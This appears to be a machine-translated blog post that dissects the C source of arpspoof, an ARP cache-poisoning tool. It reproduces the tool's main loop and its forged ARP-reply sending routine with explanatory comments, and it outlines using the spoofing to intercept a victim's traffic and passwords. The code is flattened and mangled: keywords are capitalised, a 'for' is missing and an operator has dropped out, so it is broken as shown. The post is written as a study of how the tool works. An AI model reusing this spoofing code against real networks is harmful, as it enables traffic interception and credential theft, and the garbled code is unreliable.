ARPspoof source code can be viewed in an easy way.

ARPspoof source code can be viewed in an easy way.

Preface

If your target is a hacker who will use the tool, ignore all of the following content. If your goal is to have your own penetration testing tool and write your own xxxtools, the source code of some simple tools will be of great benefit.

Background

Today, I am bored with my painstaking efforts to analyze the source code of a small tool.

I am also a hacker, but I have a certain network programming skills and have been determined not to be a hacker who only uses tools, so my goal this evening is the ARPspoof that has been abused.

To be honest, I really don't like God-driven hacking tools. So today we will take ARPspoof for a knife to see how many "terrible things" are hidden in this ARPspoof trick"

First of all, I have read some articles about ARP attacks on FreeBuf. I think I can see them, but I am a fan (not knowledgeable about tcpip, people with weak network knowledge may suffer.) then, I am going to give a simple and micro-minded explanation of this problem, such as vulnerabilities or errors in the article.

Find the source code of ARPspoof, and the core code remains unchanged, so let's get started! However, the source code of ARPspoof is constantly being reconstructed with version updates. I found a relatively stable version.

Supplement basic knowledge in an easy way

Before that, please allow me to add some basic knowledge.

Arp packet function: after each computer enters the network, an arp packet is broadcast to declare its identity (ip address, mac address, etc ), if arp is maliciously hijacked, we are familiar with arp pollution or arp hijacking. To make it easier for everyone to understand, we can look at the ID card we usually use. If the ID card is taken away, can it be used to open an account and perform money laundering or something bad? That's right. We can take arp as an example, but it is not completely correct. It is sufficient for us to understand this tool as long as we discuss it in this article.

Libnet library. This library is a magic library that can be used to directly process the link layer. If you are tired of using the socket, you can take a look at the libnet library, you can also guess that if you send a large number of link layer datagram, it may cause network instability and other problems, then the problem is the flood attack. Is the DDOS attack implemented? I am still very interested in revealing this question. To put it bluntly, we will see the use of libnet in arpspoof.

The most basic network knowledge and basic Linux kernel programming knowledge this article is already available by default. So can we start next? No, no, no.

Think like a hacker

I also need to talk a little bit about arp hijacking:

I will search for an example of arp hijacking on the Internet at will.

It's because of baidu. In fact, this is nothing mysterious, but it works well.

This is not what I want to talk about. I personally divide arp attacks into two types: 1. arp disconnection and 2. arp hijacking. In fact, when successfully implementing arp disconnection, the actual effect is that the attacked host treats the attacked machine as a gateway, and all the packets are sent to the attacker. That is to say, in theory, you can get all the packets it sends (including the password ???), Of course, the password is very likely to be encrypted.

What should we do if we receive a packet sent by an attacker? Check it out? However, it seems that viewing is of little significance (because there is no return, attackers repeatedly send request data packets, and there is no data exchange. Such data packets are actually meaningless ), so we can try to disguise it. The simplest way is to cheat the gateway again? Bingo! Correct. OK. Is it possible to cheat the gateway again? The victim package you received was not stolen... In fact, it is a good solution, port redirection. The specific implementation is not the focus.

In fact, let's take a look at the source code of this arpspoof tool. Now we can officially start!

Starting from the main function

First of all, don't panic. I have added numerous comments, and the code of this tool is only 400 lines. First, let's take a look at the main function:

In order to avoid getting too nervous, I added a detailed explanation in the source code annotations to help students with poor foundations understand:

Int main (int argc, char * argv []) {int c; char ebuf [PCAP_ERRBUF_SIZE]; intf = NULL; spoof_ip = target_ip = 0; /** for the getopt function, I want to explain it as follows. You can understand the specific meaning of the following function: 1. getopt: used to process function parameters. 2. getopt usage: argc and argv are obtained directly from the main parameter. The third parameter describes the command requirements of the entire program. The specific usage can be understood as requirement I first, t these two parameters must have values, and then the specific value will be paid to the global variable optarg, in this way, we can understand the operations in the following while LOOP */while (c = getopt (argc, argv, "I: t: h? V "))! =-1) {switch (c) {case 'I': intf = optarg; break; case 'T':/* libnet_name_resolve is a DNS domain name, then, the IP address of the domain name resolution result is returned to target_ip */if (target_ip = libnet_name_resolve (optarg, 1) =-1) usage (); break; default: usage () ;}} argc-= optind; argv + = optind; if (argc! = 1) usage (); if (spoof_ip = libnet_name_resolve (argv [0], 1) =-1) usage (); /* pcap_lookupdev, as its name implies, is a function in the pcap library used to find available network devices on the local machine. The following if statement will call pcap_lookupdev if the intf (-I parameter is null to find the local network device) ebuf is error_buf used to store error messages */if (intf = NULL & (intf = pcap_lookupdev (ebuf) = NULL) errx (1, "% s ", ebuf);/* The libnet_open_link_interface function exists in the libnet library. It is used to open the network link device error information pointed to by intf and store it in ebuf. */If (llif = libnet_open_link_interface (intf, ebuf) = 0) errx (1, "% s", ebuf ); /* the following statement indicates that if target_ip is 0 or the target_ip cannot be found in arp_find, an error is displayed */if (target_ip! = 0 &&! Arp_find (target_ip, & target_mac) errx (1, "couldn't arp for host % s", libnet_host_lookup (target_ip, 0 )); // if you are not clear about signal processing, you can skip this section. // if you are interested, you can take a closer look, because this is not the focus of this article, I will not repeat signal (SIGHUP, cleanup); signal (SIGINT, cleanup); signal (SIGTERM, cleanup); (;;) {/* In this for loop, we can see the core module arp_send. When you look at this function, you will know that this function is used to send forged arp packets, the specific usage of this function will be discussed later */arp_send (llif, intf, ARPOP_REPLY, NULL, spoof_ip, (Target_ip? (U_char *) & target_mac: NULL), target_ip); sleep (2);}/* NOTREACHED */exit (0 );}

After reading various things in the main function, we found that there is no mystery. In fact, it is very simple programming. The specific function explanations are all written in comments.

Debut of core functions

Next, let's take a look at how he sends arp packets. In fact, after reading the source code, we will know that there is really no technical content,

/** Here is the core implementation of arp packet sending. I will first introduce the parameters of this function for your convenience to understand parameter 1: libnet link layer interface. Through this interface, you can operate link layer parameter 2: intf (specified by-I or pcap_lookupdev) parameter 3: arpop to specify the operation parameter 4: hardware address parameter 5: ip address parameter 6: target hardware address parameter 7: Target ip */int arp_send (struct libnet_link_int * llif, char * dev, int op, u_char * sha, in_addr_t spa, u_char * tha, in_addr_t tpa) {char ebuf [128]; u_char pkt [60]; /* use the link layer and network card to obtain the mac address of dev */if (sha = NULL & (sha = (u_char *) libnet _ Get_hwaddr (llif, dev, ebuf) = NULL) {return (-1 );} /* obtain the dev IP address through the link layer and network card */if (spa = 0) {if (spa = libnet_get_ipaddr (llif, dev, ebuf) = 0) return (-1); spa = htonl (spa ); /* XXX */}/* if the target mac does not exist, it is assigned \ xff */if (tha = NULL) tha = "\ xff";/* initialize libnet_build_ethernet (u_int8_t * dst, u_int8_t * src, struct, u_int8_t * payload, u_int3 2_tpayload_s, libnet_t * l, libnet_ptag_t ptag) function: Construct an Ethernet data packet parameter: dst: Destination macsrc: Source mactype: Upper-layer protocol payload: load, that is, the attached data, it can be set to NULL (usually NULL here) payload_s: Load Length, or 0 (usually 0 here) l: libnet handle, libnet_init () returns libnet * pointer ptag: protocol flag. When a new packet is sent to the group for the first time, the value of this position is written to the value of this function in the same application. Returned value: Success: Protocol tag failed:-1 */libnet_build_ethernet (tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);/* libnet_ptag_t libnet_build_arp (u_int16_t hrd, u_int16_t pro, u_int8_t hln, u_int8_t pln, u_int16_t op, u_int8_t * sha, u_int8_t * spa, u_int8_t * tha, u_int8_t * tpa, u_int8_t * payload, u_int32_t payload_s, liblib_t * l, libnet_ptag_t ptag) function: Construct arp packet parameters: hrd: hardware address format, ARPHRD_ETHER (Ethernet) pro: Protocol address format, ETHERTYPE_IP (IP protocol) hln: hardware address length pl N: Protocol address length op: ARP Protocol operation type (1: ARP request, 2: ARP response, 3: RARP request, 4: RARP response) sha: sender hardware address spa: sender Protocol address tha: destination hardware address tpa: Destination Protocol address payload: load, which can be set to NULL (NULL is usually written here) payload_s: Load Length, or 0 (usually 0 here) l: libnet handle, libnet * pointer ptag returned by libnet_init (): Protocol tag. When a new packet is sent in the first group, 0 is written here, in the same application, when the next packet is regrouped, the value at this position is the return value of this function. Returned value: Success: Protocol tag failed:-1 */libnet_build_arp (ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, op, sha, (u_char *) & spa, tha, (u_char *) & tpa, NULL, 0, pkt + ETH_H); fprintf (stderr, "% s", ether_ntoa (struct ether_addr *) sha )); /* the following if and else Are echo processing (that is, the part you can see */if (op = ARPOP_REQUEST) {fprintf (stderr, "% s 0806 42: arp who-has % s tell % s \ n ", ether_ntoa (struct ether_addr *) tha), libnet_host_lookup (tpa, 0), libnet_host_lookup (spa, 0 ));} else {fprintf (stderr, "% s 0806 42: arp reply % s is-at", ether_ntoa (struct ether_addr *) tha), libnet_host_lookup (spa, 0 )); fprintf (stderr, "% s \ n", ether_ntoa (struct ether_addr *) sha);} return (libnet_write_link_layer (llif, dev, pkt, sizeof (pkt )) = sizeof (pkt ));}

We can see that there is really nothing amazing, right?

Tail/* Below we find that all the signal processing functions attached are cleanup functions. This function is very understandable, that is, to re-Send the package three times when the local network device exists, but why? It seems that there is no unreasonable reason to interrupt immediately. I think the author meant to always give a buffer time. Let's take a closer look. In the main loop, it is sleep (2) in the following loop, sleep (1) */void cleanup (int sig) {int I; if (arp_find (spoof_ip, & spoof_mac) {for (I = 0; I 3; I ++) {/* XXX-on BSD, requires ETHERSPOOF kernel. * // * the above comment is added by the source code author, meaning that the third-party kernel module of ETHERSPOOF is required in the BSD system */arp_send (llif, intf, ARPOP_REPLY, (u_char *) & spoof_mac, spoof_ip, (target_ip? (U_char *) & target_mac: NULL), target_ip); sleep (1) ;}} exit (0 );}

So what do we not understand? In the man-in-the-middle attack-ARP poisoning (http://www.bkjia.com/Article/201207/144532.html) article, the arpspoof tool was decrypted in this way, do you start to think that this is actually nothing magical? This is our God-driven hacking tool.

Download Attachment

Link password: rsua

If you have a high opinion, I hope you will not be enlightened ~~